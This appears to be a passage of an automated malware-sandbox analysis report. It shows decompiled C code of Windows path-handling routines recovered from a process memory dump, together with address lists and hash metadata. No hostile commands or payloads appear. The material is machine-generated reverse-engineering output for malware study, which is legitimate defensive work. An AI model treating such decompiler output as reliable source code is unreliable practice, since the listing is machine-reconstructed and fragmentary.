								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0162D130(_t427, _t494, _t511);
				}
			}

0x016a5ba5
0x016a5baa
0x016a5baf
0x016a5bb4
0x016a5bb6
0x016a5bbc
0x016a5bbe
0x016a5bc4
0x016a5bcd
0x016a5bd3
0x016a5bd6
0x016a5bdc
0x016a5be0
0x016a5be3
0x016a5beb
0x016a5bf2
0x016a5bf8
0x016a5bfe
0x016a5c04
0x016a5c0e
0x016a5c18
0x016a5c1f
0x016a5c25
0x016a5c2a
0x016a5c2c
0x016a5c32
0x016a5c3a
0x016a5c3f
0x016a5c42
0x016a5c48
0x016a5c5b
0x016a5c5b
0x016a5c2c
0x016a5cb7
0x016a5cb9
0x016a5cbf
0x016a5cc2
0x016a5cca
0x016a5ccb
0x016a5ccb
0x016a5cd1
0x016a5cd7
0x016a5cda
0x016a5ce1
0x016a5ce4
0x016a5ce7
0x016a5ced
0x016a5cf3
0x016a5cf9
0x016a5cff
0x016a5d08
0x016a5d0a
0x016a5d0e
0x016a5d10
0x00000000
0x00000000
0x016a5d16
0x016a5d1a
0x00000000
0x00000000
0x016a5d20
0x016a5d22
0x016a5d25
0x016a5d2f
0x016a5d2f
0x016a5d33
0x016a5d3d
0x016a5d49
0x016a5d4b
0x00000000
0x00000000
0x016a5d5a
0x016a5d5d
0x016a5d60
0x00000000
0x00000000
0x016a5d66
0x016a5d69
0x00000000
0x00000000
0x016a5d6f
0x016a5d6f
0x016a5d73
0x016a5d79
0x016a5d7f
0x016a5d86
0x016a5d95
0x016a5d98
0x016a5dba
0x016a5dcb
0x016a5dce
0x016a5dd3
0x016a5dd6
0x016a5dd8
0x016a5de6
0x016a5dec
0x016a5dee
0x016a5df1
0x016a5df3
0x016a635a
0x016a635a
0x00000000
0x016a635a
0x016a5dfe
0x016a5e02
0x016a5e05
0x016a5e07
0x016a5e10
0x016a5e13
0x016a5e1b
0x016a5e1c
0x016a5e21
0x016a5e22
0x016a5e23
0x016a5e25
0x016a5e2a
0x016a5e2c
0x016a5e2e
0x016a5e36
0x016a5e39
0x016a5e42
0x016a5e47
0x016a5e4d
0x016a5e54
0x016a5e54
0x016a5e54
0x016a5e2e
0x016a5e5c
0x016a5e5f
0x016a5e62
0x016a5e64
0x016a5e6b
0x016a5e70
0x016a5e7a
0x016a5e7a
0x016a5e7a
0x016a5e6b
0x016a5e7e
0x016a5e7f
0x016a5e7f
0x016a5e81
0x016a5e87
0x016a5e8b
0x016a5e8c
0x016a5e8c
0x016a5e8c
0x016a5e9a
0x016a5e9c
0x016a5ea2
0x016a5ea6
0x016a5f50
0x016a5f50
0x016a5f57
0x016a5f66
0x016a5f66
0x016a5f66
0x016a5f68
0x016a5f6a
0x016a63d0
0x00000000
0x016a5f70
0x016a5f70
0x016a5f91
0x016a5f9c
0x016a5f9e
0x016a5fa4
0x016a5fa6
0x016a638c
0x016a6392
0x016a63a1
0x016a63a7
0x016a63af
0x016a63af
0x016a63bd
0x016a63d8
0x00000000
0x016a63d8
0x016a5fac
0x016a5fb2
0x016a5fb4
0x016a5fbd
0x016a5fc6
0x016a5fce
0x016a5fd4
0x016a5fdc
0x016a5fec
0x016a5fed
0x016a5fee
0x016a5fef
0x016a5ff9
0x016a5ffa
0x016a5ffb
0x016a5ffc
0x016a6000
0x016a6004
0x016a6012
0x016a6012
0x016a6018
0x016a6019
0x016a601a
0x016a601b
0x016a601c
0x016a6020
0x016a6059
0x016a605c
0x016a6061
0x016a6061
0x016a6022
0x016a6022
0x016a6022
0x016a6025
0x016a602a
0x016a602b
0x016a6031
0x016a6037
0x016a6038
0x016a603e
0x016a6048
0x016a6049
0x016a604a
0x016a604b
0x016a604c
0x016a604d
0x016a6053
0x016a6054
0x016a6054
0x016a6062
0x016a6065
0x016a6067
0x016a606a
0x016a6070
0x016a6075
0x016a6076
0x016a6081
0x016a6087
0x016a6095
0x016a6099
0x016a609e
0x016a60a4
0x016a60ae
0x016a60b0
0x016a60b3
0x016a60b6
0x016a60b8
0x016a60ba
0x016a60ba
0x016a60ba
0x016a60ba
0x016a60be
0x016a60c0
0x016a60c5
0x016a60c5
0x016a60c5
0x016a60c6
0x016a60cd
0x016a6114
0x016a60cf
0x016a60cf
0x016a60d4
0x016a60d5
0x016a60da
0x016a60db
0x016a60e1
0x016a60e2
0x016a60e8
0x016a60f8
0x016a60fd
0x016a60fe
0x016a6102
0x016a6104
0x016a6107
0x016a6109
0x016a610b
0x016a610b
0x016a610b
0x016a610b
0x016a610f
0x016a610f
0x016a6117
0x016a611a
0x016a611f
0x016a6125
0x016a6134
0x016a6139
0x016a613f
0x016a6146
0x016a6148
0x016a614b
0x016a614d
0x016a614f
0x016a614f
0x016a614f
0x016a614f
0x016a6153
0x016a6159
0x016a6159
0x016a615c
0x016a6163
0x016a6169
0x016a616c
0x016a6172
0x016a6181
0x016a6186
0x016a6187
0x016a618b
0x016a6191
0x016a6195
0x016a61a3
0x016a61bb
0x016a61c0
0x016a61c3
0x016a61cc
0x016a61d0
0x016a61dc
0x016a61de
0x016a61e1
0x016a61e4
0x016a61e6
0x016a61e8
0x016a61e8
0x016a61e8
0x016a61e8
0x016a61e6
0x016a61ec
0x016a61f3
0x016a6203
0x016a6209
0x016a620a
0x016a6216
0x016a621d
0x016a6227
0x016a6241
0x016a6246
0x016a624c
0x016a6257
0x016a6259
0x016a625c
0x016a625e
0x016a6260
0x016a6260
0x016a6260
0x016a6260
0x016a625e
0x016a6264
0x016a6267
0x016a6269
0x016a6315
0x016a6315
0x016a631b
0x016a631e
0x016a6324
0x016a6327
0x016a632f
0x016a6330
0x016a6333
0x016a633a
0x016a633c
0x016a6335
0x016a6335
0x016a6335
0x016a633f
0x016a6342
0x016a634c
0x016a6352
0x016a6355
0x016a6355
0x016a6359
0x00000000
0x016a626f
0x016a6275
0x016a6275
0x016a6278
0x016a627e
0x016a627e
0x016a6281
0x016a6287
0x016a628d
0x016a6298
0x016a629c
0x016a62a2
0x016a629e
0x016a629e
0x016a629e
0x016a62a7
0x016a62a7
0x016a62aa
0x016a62b0
0x016a62f0
0x016a62f0
0x016a62f2
0x016a62f8
0x016a62fd
0x016a62b2
0x016a62b2
0x016a62b2
0x016a62b5
0x016a62dd
0x016a62e2
0x016a62e5
0x016a62b7
0x016a62b8
0x016a62bb
0x016a62bd
0x016a62c0
0x016a62c4
0x016a62cd
0x016a62cd
0x016a62c0
0x016a62bb
0x016a62b5
0x016a6302
0x016a6303
0x016a6305
0x016a6305
0x016a6305
0x016a630c
0x016a630c
0x00000000
0x016a627e
0x016a6269
0x016a5eac
0x016a5ebb
0x016a5ebe
0x016a5ecb
0x016a5ecb
0x016a5ece
0x016a5ece
0x016a5ed4
0x016a5ed7
0x016a5ed9
0x016a5edb
0x016a5edb
0x016a5ee1
0x016a5ee1
0x016a5ee3
0x016a5f20
0x016a5f20
0x016a5ee5
0x016a5ee5
0x016a5ee5
0x016a5ee8
0x016a5f11
0x016a5f18
0x016a5eea
0x016a5eea
0x016a5eed
0x016a5ef2
0x016a5ef8
0x016a5efb
0x016a5f0a
0x016a5f0a
0x016a5eed
0x016a5ee8
0x016a5f22
0x016a5f28
0x00000000
0x00000000
0x016a5f30
0x016a5f31
0x016a5f37
0x016a5f3a
0x016a5f3d
0x016a5f44
0x00000000
0x00000000
0x00000000
0x016a5f46
0x016a5f48
0x016a5f4d
0x00000000
0x016a5f4d
0x016a5dda
0x016a5ddf
0x00000000
0x016a5ddf
0x016a5dd8
0x016a5da7
0x016a5da9
0x016a5dac
0x016a5dae
0x00000000
0x016a5db4
0x016a5db4
0x00000000
0x016a5db4
0x016a5dae
0x016a5d88
0x016a5d8d
0x016a6363
0x016a6369
0x016a636a
0x016a6370
0x016a6372
0x016a637a
0x016a637b
0x016a637d
0x00000000
0x00000000
0x016a637f
0x016a6385
0x00000000
0x016a6385
0x016a5d38
0x016a5d3b
0x00000000
0x00000000
0x00000000
0x016a5d3b
0x016a5d27
0x016a5d29
0x00000000
0x00000000
0x00000000
0x016a6360
0x00000000
0x016a6360
0x016a5c10
0x016a5c10
0x016a63da
0x016a63e5
0x016a63e5

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0f680a69e90962dfc94f69caf39ec962529e855d3fd60e26dbff8e477185078
Instruction ID: c8e7a576375bb53c8c04cab4262102067267cd9eeabfb728b2d8cc7fec885ac4
Opcode Fuzzy Hash: f0f680a69e90962dfc94f69caf39ec962529e855d3fd60e26dbff8e477185078
Instruction Fuzzy Hash: 0C423875A002298FDB24CF68CC80BA9BBB1FF45304F5981AAD94DAB342D774AD85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 015F4120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E015F4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x16cd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0160F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E015F6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L015F4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E015F6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M015F45F8))) {
												case 0:
													_v568 = 0x15b1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x15b11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L015F4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0161F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0161F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E015D52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E015EEB70(1, 0x16c79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E015EAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E016195D0();
																			L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0161B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01613D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0161B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x015f4128
0x015f4135
0x015f413c
0x015f4141
0x015f4145
0x015f4147
0x015f414e
0x015f4151
0x015f4159
0x015f415c
0x015f4160
0x015f4164
0x015f4168
0x015f416c
0x015f417f
0x015f4181
0x015f446a
0x015f446a
0x015f418c
0x015f4195
0x015f4199
0x015f4432
0x015f4439
0x015f443d
0x015f4442
0x015f4447
0x00000000
0x015f419f
0x015f41a3
0x015f41b1
0x015f41b9
0x015f41bd
0x015f45db
0x015f45db
0x00000000
0x015f41c3
0x015f41c3
0x015f41ce
0x015f41d4
0x0163e138
0x0163e13e
0x0163e169
0x0163e16d
0x0163e19e
0x0163e16f
0x0163e16f
0x0163e175
0x0163e179
0x0163e18f
0x0163e193
0x00000000
0x0163e199
0x00000000
0x0163e199
0x0163e193
0x00000000
0x00000000
0x00000000
0x015f41da
0x015f41da
0x015f41df
0x015f41e4
0x015f41ec
0x015f4203
0x015f4207
0x0163e1fd
0x015f4222
0x015f4226
0x0163e1f3
0x0163e1f3
0x015f422c
0x015f422c
0x015f4233
0x0163e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x015f4239
0x015f4239
0x015f4239
0x015f4239
0x015f4233
0x015f4226
0x015f41ee
0x015f41ee
0x015f41f4
0x015f4575
0x0163e1b1
0x0163e1b1
0x00000000
0x015f457b
0x015f457b
0x015f4582
0x0163e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x015f4588
0x015f4588
0x015f458c
0x0163e1c4
0x0163e1c4
0x00000000
0x015f4592
0x015f4592
0x015f4599
0x0163e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x015f459f
0x015f459f
0x015f45a3
0x0163e1d7
0x0163e1e4
0x00000000
0x015f45a9
0x015f45a9
0x015f45b0
0x0163e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x015f45b6
0x015f45b6
0x015f45b6
0x00000000
0x015f45b6
0x015f45b0
0x015f45a3
0x015f4599
0x015f458c
0x015f4582
0x00000000
0x00000000
0x00000000
0x00000000
0x015f41f4
0x015f423e
0x015f4241
0x015f45c0
0x015f45c4
0x00000000
0x015f45ca
0x015f45ca
0x00000000
0x0163e207
0x0163e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x015f45d1
0x00000000
0x00000000
0x015f45ca
0x00000000
0x015f4247
0x015f4247
0x015f4247
0x015f4249
0x015f4249
0x015f4249
0x015f4251
0x015f4251
0x015f4257
0x015f425f
0x015f426e
0x015f4270
0x015f427a
0x0163e219
0x0163e219
0x015f4280
0x015f4282
0x015f4456
0x015f45ea
0x00000000
0x015f45f0
0x0163e223
0x00000000
0x0163e223
0x015f445c
0x015f445c
0x00000000
0x015f445c
0x00000000
0x015f4288
0x015f428c
0x0163e298
0x015f4292
0x015f4292
0x015f429e
0x015f42a3
0x015f42a7
0x015f42ac
0x0163e22d
0x015f42b2
0x015f42b2
0x015f42b9
0x015f42bc
0x015f42c2
0x015f42ca
0x015f42cd
0x015f42cd
0x015f42d4
0x015f433f
0x015f433f
0x015f42d6
0x015f42d6
0x015f42d9
0x015f42dd
0x015f42eb
0x0163e23a
0x015f42f1
0x015f4305
0x015f430d
0x015f4315
0x015f4318
0x015f431f
0x015f4322
0x015f432e
0x015f433b
0x015f433b
0x00000000
0x015f432e
0x015f42eb
0x015f434c
0x015f434e
0x015f4352
0x015f4359
0x015f435e
0x015f4361
0x015f436e
0x015f438a
0x015f438e
0x015f4396
0x015f439e
0x015f43a1
0x015f43ad
0x015f43bb
0x015f43bb
0x015f43ad
0x015f436e
0x015f43bf
0x015f43c5
0x015f4463
0x015f4463
0x015f43ce
0x015f43d5
0x015f43d9
0x015f43df
0x015f4475
0x015f4479
0x015f4491
0x015f4491
0x015f4479
0x015f43e5
0x015f43eb
0x015f43f4
0x015f43f6
0x015f43f9
0x015f43fc
0x015f43ff
0x015f44e8
0x015f44ed
0x015f44f3
0x0163e247
0x00000000
0x015f44f9
0x015f4504
0x015f4508
0x015f450f
0x0163e269
0x00000000
0x015f4515
0x015f4519
0x015f4531
0x015f4534
0x015f4537
0x015f453e
0x015f4541
0x015f454a
0x0163e255
0x0163e255
0x0163e25b
0x0163e25e
0x0163e261
0x0163e261
0x015f4555
0x015f4559
0x015f455d
0x0163e26d
0x0163e270
0x0163e274
0x0163e27a
0x0163e27d
0x0163e28e
0x0163e28e
0x015f4563
0x015f4563
0x015f4569
0x015f4569
0x00000000
0x015f455d
0x015f450f
0x00000000
0x015f44f3
0x015f43ff
0x015f4405
0x015f4405
0x015f4405
0x015f42ac
0x015f428c
0x015f4282
0x015f4407
0x015f440d
0x0163e2af
0x0163e2af
0x015f4413
0x015f4413
0x00000000
0x015f41d4
0x00000000
0x015f41c3
0x015f41bd
0x015f4415
0x015f4415
0x015f4416
0x015f4417
0x015f4429
0x015f416e
0x015f416e
0x015f4175
0x015f4498
0x015f449f
0x0163e12d
0x00000000
0x0163e133
0x00000000
0x0163e133
0x015f44a5
0x015f44a5
0x015f44aa
0x00000000
0x015f44bb
0x015f44ca
0x015f44d6
0x015f44d7
0x015f44d8
0x015f44e3
0x015f44e3
0x015f44aa
0x015f417b
0x015f417b
0x015f417b
0x00000000
0x015f417b
0x015f4175
0x00000000

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f46d8f8e73f2a4186d94cdb0ffef5b14aba72ad5b915edaee8dce0111ad5da
Instruction ID: 22960aa4fd94a78b41131447e8a3b083e56ca6a77391c03b79a51c049bbdc9df
Opcode Fuzzy Hash: 77f46d8f8e73f2a4186d94cdb0ffef5b14aba72ad5b915edaee8dce0111ad5da
Instruction Fuzzy Hash: 42F169746082118BD724DF59C884A7BBBE1FF98714F04892EFA96CB390E735D885CB52

Uniqueness

Uniqueness Score: -1.00%

Function 016020A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E016020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x16c8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01602EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01602EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E015D58EC(_t240);
									_t221 =  *0x16c5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
